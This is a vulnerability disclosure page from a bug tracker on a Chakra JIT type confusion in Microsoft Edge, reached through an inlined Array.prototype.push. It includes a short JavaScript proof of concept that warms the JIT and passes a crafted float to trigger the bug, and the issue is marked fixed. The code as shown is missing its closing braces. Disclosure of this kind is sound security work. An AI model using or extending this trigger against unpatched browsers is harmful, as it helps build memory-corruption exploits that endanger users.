New issue
Advanced search Search tips

Issue 1578 link

Starred by 2 users

Issue metadata

Status: Fixed
Closed: Aug 16

Sign in to add a comment

Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush

Project Member Reported by, May 17 2018

Issue description

This is similar to  issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for  issue 1531 .

function opt(arr, value) {
	arr.push(value);  // <--------
	arr[0] = 2.3023e-320;

function main() {
    for (let i = 0; i < 0x10000; i++) {
		let tmp = [1.1, 2.2, 3.3];
		delete tmp[1];

        opt(tmp, 2.2);

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Project Member

Comment 1 by, Aug 16

Status: Fixed (was: New)
Project Member

Comment 2 by, Aug 17

Labels: -Restrict-View-Commit
Project Member

Comment 3 by, Aug 27

 Issue 1581  has been merged into this issue.

Sign in to add a comment